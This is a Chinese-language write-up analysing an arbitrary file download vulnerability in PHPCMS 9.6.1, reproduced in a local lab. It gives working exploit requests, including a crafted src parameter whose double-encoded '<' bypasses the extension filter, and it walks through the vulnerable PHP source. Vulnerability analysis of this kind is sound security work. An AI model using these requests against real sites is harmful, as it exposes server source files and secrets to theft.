phpcms 9.6.1任意文件下载漏洞分析

环境: phpstudy本地搭建phpcms apache2 4 39+php5 3 29+mysql8 0 12 漏洞影响版本: PHPCMS 9 6

环境:

phpstudy本地搭建phpcms

apache2.4.39+php5.3.29+mysql8.0.12

 

漏洞影响版本:

PHPCMS 9.6.1

 

复现

1、访问index.php?m=wap&c=index&siteid=1得到加密后的cookie值

2、访问/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=pad%3Dx%26i%3D1%26modelid%3D1%26catid%3D1%26d%3D1%26m%3D1%26s%3D./phpcms/base%26f%3D.p%25253chp,post请求数据userid_flash,得到返回的json加密cookie值

 

 3、访问/index.php?m=content&c=down&a=init&a_k=e41e77MD49WyuTZBvaAfcVQqkpx2Cg9YZPvAhkQYUWr-ngvrASco1B-16MgdqeVrfNXR45Gv8r_5784KVVGvVmMKxxJHba-PfKCbUAWCLEpwO43AFbkL8bfn53hP40TWS488ENEPQOeim3zFlSW1XezD0vlcqTWZjoEfFRJG,a_k值为第二部得到的cookie值,成功下载base.php文件

 

 

 

分析:

1、wap模块index.php代码分析

 1     function __construct() {        
 2         $this->db = pc_base::load_model('content_model');
 3         $this->siteid = isset($_GET['siteid']) && (intval($_GET['siteid']) > 0) ? intval(trim($_GET['siteid'])) : (param::get_cookie('siteid') ? param::get_cookie('siteid') : 1);
 4         param::set_cookie('siteid',$this->siteid);    
 5         $this->wap_site = getcache('wap_site','wap');
 6         $this->types = getcache('wap_type','wap');
 7         $this->wap = $this->wap_site[$this->siteid];
 8         define('WAP_SITEURL', $this->wap['domain'] ? $this->wap['domain'].'index.php?' : APP_PATH.'index.php?m=wap&siteid='.$this->siteid);
 9         if($this->wap['status']!=1) exit(L('wap_close_status'));
10     }

第3、4行将获取到的siteid进行加密并且通过set_cookie方法设置cookie返回cookie

 

2、attachment模块attachments.php代码分析

 1     public function swfupload_json() {
 2         $arr['aid'] = intval($_GET['aid']);
 3         $arr['src'] = safe_replace(trim($_GET['src']));
 4         $arr['filename'] = urlencode(safe_replace($_GET['filename']));
 5         $json_str = json_encode($arr);
 6         $att_arr_exist = param::get_cookie('att_json');
 7         $att_arr_exist_tmp = explode('||', $att_arr_exist);
 8         if(is_array($att_arr_exist_tmp) && in_array($json_str, $att_arr_exist_tmp)) {
 9             return true;
10         } else {
11             $json_str = $att_arr_exist ? $att_arr_exist.'||'.$json_str : $json_str;
12             param::set_cookie('att_json',$json_str);
13             return true;            
14         }
15     }

通过attachment模块中的attachments.php中的函数swfupload_json(),将获取的aid、src、filename变量赋值然后通过json_encode函数进行json编码,在第12行通过set_cookie对这里我们传入的变量的json编码进行加密。

 

4、content模块down.php代码分析

 1     public function init() {
 2         $a_k = trim($_GET['a_k']);
 3         if(!isset($a_k)) showmessage(L('illegal_parameters'));
 4         $a_k = sys_auth($a_k, 'DECODE', pc_base::load_config('system','auth_key'));
 5         if(empty($a_k)) showmessage(L('illegal_parameters'));
 6         unset($i,$m,$f);
 7         $a_k = safe_replace($a_k);
 8         parse_str($a_k);
 9         if(isset($i)) $i = $id = intval($i);
10         if(!isset($m)) showmessage(L('illegal_parameters'));
11         if(!isset($modelid)||!isset($catid)) showmessage(L('illegal_parameters'));
12         if(empty($f)) showmessage(L('url_invalid'));
13         $allow_visitor = 1;
14         $id = intval($id);
15         $modelid  = intval($modelid);
16         $catid  = intval($catid);
17         $MODEL = getcache('model','commons');
18         $tablename = $this->db->table_name = $this->db->db_tablepre.$MODEL[$modelid]['tablename'];
19         $this->db->table_name = $tablename.'_data';
20         $rs = $this->db->get_one(array('id'=>$id));    
21         $siteids = getcache('category_content','commons');
22         $siteid = $siteids[$catid];
23         $CATEGORYS = getcache('category_content_'.$siteid,'commons');
24 
25         $this->category = $CATEGORYS[$catid];
26         $this->category_setting = string2array($this->category['setting']);
27         
28         //检查文章会员组权限
29         $groupids_view = '';
30         if ($rs['groupids_view']) $groupids_view = explode(',', $rs['groupids_view']);
31         if($groupids_view && is_array($groupids_view)) {
32             $_groupid = param::get_cookie('_groupid');
33             $_groupid = intval($_groupid);
34             if(!$_groupid) {
35                 $forward = urlencode(get_url());
36                 showmessage(L('login_website'),APP_PATH.'index.php?m=member&c=index&a=login&forward='.$forward);
37             }
38             if(!in_array($_groupid,$groupids_view)) showmessage(L('no_priv'));
39         } else {
40             //根据栏目访问权限判断权限
41             $_priv_data = $this->_category_priv($catid);
42             if($_priv_data=='-1') {
43                 $forward = urlencode(get_url());
44                 showmessage(L('login_website'),APP_PATH.'index.php?m=member&c=index&a=login&forward='.$forward);
45             } elseif($_priv_data=='-2') {
46                 showmessage(L('no_priv'));
47             }
48         }
49         //阅读收费 类型
50         $paytype = $rs['paytype'];
51         $readpoint = $rs['readpoint'];
52         if($readpoint || $this->category_setting['defaultchargepoint']) {
53             if(!$readpoint) {
54                 $readpoint = $this->category_setting['defaultchargepoint'];
55                 $paytype = $this->category_setting['paytype'];
56             }        
57             //检查是否支付过
58             $allow_visitor = self::_check_payment($catid.'_'.$id,$paytype,$catid);
59             if(!$allow_visitor) {
60                 $http_referer = urlencode(get_url());
61                 $allow_visitor = sys_auth($catid.'_'.$id.'|'.$readpoint.'|'.$paytype).'&http_referer='.$http_referer;
62             } else {
63                 $allow_visitor = 1;
64             }
65         }
66         if(preg_match('/(php|phtml|php3|php4|jsp|dll|asp|cer|asa|shtml|shtm|aspx|asax|cgi|fcgi|pl)(\.|$)/i',$f) || strpos($f, ":\\")!==FALSE || strpos($f,'..')!==FALSE) showmessage(L('url_error'));
67         if(strpos($f, 'http://') !== FALSE || strpos($f, 'ftp://') !== FALSE || strpos($f, '://') === FALSE) {
68             $pc_auth_key = md5(pc_base::load_config('system','auth_key').$_SERVER['HTTP_USER_AGENT'].'down');
69             $a_k = urlencode(sys_auth("i=$i&d=$d&s=$s&t=".SYS_TIME."&ip=".ip()."&m=".$m."&f=$f&modelid=".$modelid, 'ENCODE', $pc_auth_key));
70             $downurl = '?m=content&c=down&a=download&a_k='.$a_k;
71         } else {
72             $downurl = $f;            
73         }
74         include template('content','download');
75     }

经过parse_str之后变量s和f的值为:

 

这里的%3c成功绕过了第66行中的对%f也就是后缀的匹配

然后在第69行重新对数据进行了一个加密

在74行对download.php进行一个包含

 1 <?php defined('IN_PHPCMS') or exit('No permission resources.'); ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 2 <html xmlns="http://www.w3.org/1999/xhtml">
 3 <head>
 4 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 5 <meta http-equiv="X-UA-Compatible" content="IE=7" />
 6 <title><?php echo $catname;?>- 下载频道_详情页</title>
 7 <!--[if IE 5]>
 8 <style type="text/css">
 9 body,html{text-align:center}
10 *{ text-align:left}
11 .header .search .text{height:26px;}
12 </style>
13 <![endif]-->
14 <link href="<?php echo CSS_PATH;?>reset.css" rel="stylesheet" type="text/css" />
15 <link href="<?php echo CSS_PATH;?>default_blue.css" rel="stylesheet" type="text/css" />
16 <link href="<?php echo CSS_PATH;?>download.css" rel="stylesheet" type="text/css" />
17 <script language="javascript" type="text/javascript" src="<?php echo JS_PATH;?>jquery.min.js"></script>
18 </head>
19 <body>
20     <style type="text/css">
21          body, html{ background:#FFF!important;}
22     </style>
23     <?php if($allow_visitor=='1') { ?>
24     <a href="<?php echo $downurl;?>" class="xzs_btn"></a>
25     <?php } else { ?>
26     <CENTER><a href="<?php echo APP_PATH;?>index.php?m=content&c=readpoint&allow_visitor=<?php echo $allow_visitor;?>"><font color="red">阅读此信息需要您支付 <B><I><?php echo $readpoint;?> <?php if($paytype) { ?>元<?php } else { ?>点<?php } ?></I></B>,点击这里支付</font></a></CENTER>
27     <?php } ?>
28 </body>
29 </html>

其中第24行就对downurl进行了一个输出,涉及到了download函数

 

5、down.php中download函数代码分析

 1     public function download() {
 2         $a_k = trim($_GET['a_k']);
 3         $pc_auth_key = md5(pc_base::load_config('system','auth_key').$_SERVER['HTTP_USER_AGENT'].'down');
 4         $a_k = sys_auth($a_k, 'DECODE', $pc_auth_key);
 5         if(empty($a_k)) showmessage(L('illegal_parameters'));
 6         unset($i,$m,$f,$t,$ip);
 7         $a_k = safe_replace($a_k);
 8         parse_str($a_k);        
 9         if(isset($i)) $downid = intval($i);
10         if(!isset($m)) showmessage(L('illegal_parameters'));
11         if(!isset($modelid)) showmessage(L('illegal_parameters'));
12         if(empty($f)) showmessage(L('url_invalid'));
13         if(!$i || $m<0) showmessage(L('illegal_parameters'));
14         if(!isset($t)) showmessage(L('illegal_parameters'));
15         if(!isset($ip)) showmessage(L('illegal_parameters'));
16         $starttime = intval($t);
17         if(preg_match('/(php|phtml|php3|php4|jsp|dll|asp|cer|asa|shtml|shtm|aspx|asax|cgi|fcgi|pl)(\.|$)/i',$f) || strpos($f, ":\\")!==FALSE || strpos($f,'..')!==FALSE) showmessage(L('url_error'));
18         $fileurl = trim($f);
19         if(!$downid || empty($fileurl) || !preg_match("/[0-9]{10}/", $starttime) || !preg_match("/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/", $ip) || $ip != ip()) showmessage(L('illegal_parameters'));    
20         $endtime = SYS_TIME - $starttime;
21         if($endtime > 3600) showmessage(L('url_invalid'));
22         if($m) $fileurl = trim($s).trim($fileurl);
23         if(preg_match('/(php|phtml|php3|php4|jsp|dll|asp|cer|asa|shtml|shtm|aspx|asax|cgi|fcgi|pl)(\.|$)/i',$fileurl) ) showmessage(L('url_error'));
24         //远程文件
25         if(strpos($fileurl, ':/') && (strpos($fileurl, pc_base::load_config('system','upload_url')) === false)) { 
26             header("Location: $fileurl");
27         } else {
28             if($d == 0) {
29                 header("Location: ".$fileurl);
30             } else {
31                 $fileurl = str_replace(array(pc_base::load_config('system','upload_url'),'/'), array(pc_base::load_config('system','upload_path'),DIRECTORY_SEPARATOR), $fileurl);
32                 $filename = basename($fileurl);
33                 //处理中文文件
34                 if(preg_match("/^([\s\S]*?)([\x81-\xfe][\x40-\xfe])([\s\S]*?)/", $fileurl)) {
35                     $filename = str_replace(array("%5C", "%2F", "%3A"), array("\\", "/", ":"), urlencode($fileurl));
36                     $filename = urldecode(basename($filename));
37                 }
38                 $ext = fileext($filename);
39                 $filename = date('Ymd_his').random(3).'.'.$ext;
40                 $fileurl = str_replace(array('<','>'), '',$fileurl);
41                 file_down($fileurl, $filename);
42             }
43         }
44     }

重点在40行,我们利用%3C也就是尖括号绕过了前面的后缀匹配,而在第40行将尖括号替换为空,这样我们变量fileurl中的后缀就变成了.php

 

 

6、跟进file_down函数

 1 function file_down($filepath, $filename = '') {
 2     if(!$filename) $filename = basename($filepath);
 3     if(is_ie()) $filename = rawurlencode($filename);
 4     $filetype = fileext($filename);
 5     $filesize = sprintf("%u", filesize($filepath));
 6     if(ob_get_length() !== false) @ob_end_clean();
 7     header('Pragma: public');
 8     header('Last-Modified: '.gmdate('D, d M Y H:i:s') . ' GMT');
 9     header('Cache-Control: no-store, no-cache, must-revalidate');
10     header('Cache-Control: pre-check=0, post-check=0, max-age=0');
11     header('Content-Transfer-Encoding: binary');
12     header('Content-Encoding: none');
13     header('Content-type: '.$filetype);
14     header('Content-Disposition: attachment; filename="'.$filename.'"');
15     header('Content-length: '.$filesize);
16     readfile($filepath);
17     exit;
18 }

 

 这里也就第5行也就成功的读取到了base.php的文件大小,以及第16行中的readfile函数传入的路径也就可以读取base.php文件了

 

标签: 加密 支付